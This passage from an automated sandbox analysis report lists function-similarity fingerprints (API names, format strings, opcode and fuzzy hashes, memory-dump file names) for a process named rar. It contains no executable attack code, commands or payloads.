                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressCompareHandleModuleOrdinalProcStringVersion
                                                                                                                                                                                                                              • String ID: CompareStringOrdinal$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 2522007465-2120454788
                                                                                                                                                                                                                              • Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                              • Instruction ID: cc627d49a2161c41c723b7bef80667d63a81a9a6c3489cd336f4a7e62a59a89c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB217F21A0D6C285EB50BF11A8401F8E2F0BF55BA0FD44135EA5E83698EF2CE4659734
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$File$swprintf$LocalSystem
                                                                                                                                                                                                                              • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                                                                                                                                                                                              • API String ID: 1364621626-1794493780
                                                                                                                                                                                                                              • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                              • Instruction ID: a1ad929723df542c2182402fbc88569889e7e5e70ca3bdb068257e5a1201c2f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E21F576A187818EE760DF64E480A9DB7F0F748BA4F545032EE4893B48DB39E8519F20
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                              • Instruction ID: fe493b243ea1782caa37193be52d8185c756c65621a9b093af523af7b1e8cec2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DF04435A196C286EF85AF11F8503B9A3A0AF987A0F881035E94F46664DF3CD4A4D730
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                              • Instruction ID: 597401f1f91252f6154a07c2abc6d2c569803609fa3da22badc276fd7b645fd5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3A10466F087C246EB61AF6484043F9A6D1AF42BB4F984635DA6D067D5DF3CE424E330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                              • Instruction ID: 3e522ab874da945b54dd8f97e6c45cf34a3db4b7959fdd2f59177af01fb4ec6f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C81AF2AB186D285FB10AF6598807FDA6E4BB45B64F804135DD2E52795CF3CE461E330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3659116390-0
                                                                                                                                                                                                                              • Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                              • Instruction ID: f11eaa016125ef59607148edaa7fdcbc81ef6c2316db2a1fb825cb698f9338ba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A351D036A18A918AEB11DF25D8443ECBBB0BB44BA8F448135CE1A47A98DF3CD151D730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 643171463-0
                                                                                                                                                                                                                              • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                              • Instruction ID: d807ced4bea84c22e6301195a283e341f0616784149c1a95ab80b9199f874b3e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2641A621E08AC246EA24BF21A8102F9A2D0AF45BB0FC40335E96D177D5DF3CE565E770
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 190572456-0
                                                                                                                                                                                                                              • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                              • Instruction ID: 7e25994b451d5f957aac10106c17264d83bfc85afd243db837fa420170a2668e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC41E525F2968295FE15AF01A8006F5E6E1BF48BF0F998535DD1D4B388EE3CE8109370
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                              • Instruction ID: 26405add48aad2584397546d9d190ae3f0eddb24902f1f49ab5d570e5adcca55
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2011B22FE9868206F7643924E4863F991C16F553F0E854234E97E067D6CEACE46A6230
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcschr$BeepMessage
                                                                                                                                                                                                                              • String ID: ($[%c]%ls
                                                                                                                                                                                                                              • API String ID: 1408639281-228076469
                                                                                                                                                                                                                              • Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                                                                              • Instruction ID: a8e8d2e692b31376d37ca96fdeefc566ed47342e05d8602030cc94a4568e11cc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E81C422A0868286EF64EF05E4402FEA7E1FB84B98F940035EE5E57755DF3CE661D720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                                                                                                                                                                                              • API String ID: 233258989-622958660
                                                                                                                                                                                                                              • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                              • Instruction ID: 7001ef9e64a5422407dd394a17cbfe4db6ec4548c314ddc69f0286790f365061
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 545139F3F386848AE7648F1CE881BE96790F364BE1F945A24F94A93B44D63DDA548700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcschr
                                                                                                                                                                                                                              • String ID: MCAOmcao$MCAOmcao
                                                                                                                                                                                                                              • API String ID: 1497570035-1725859250
                                                                                                                                                                                                                              • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                              • Instruction ID: d77b62805d8e5a4d17a1e20cb44be5768b93043fa9907c248e2fe6e445d68ac9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03418012E0C6C780EA21BF2151515FDD2E1AF51BA4FD84032EA5D462D9EE2DF670B231
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00007FF7CF8A359E
                                                                                                                                                                                                                              • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8A35E6
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF7CF8A305D,?,?,?,?,?,?,?,?,00007FF7CF8B4126,?,?,?,?,00000800), ref: 00007FF7CF8A30F0
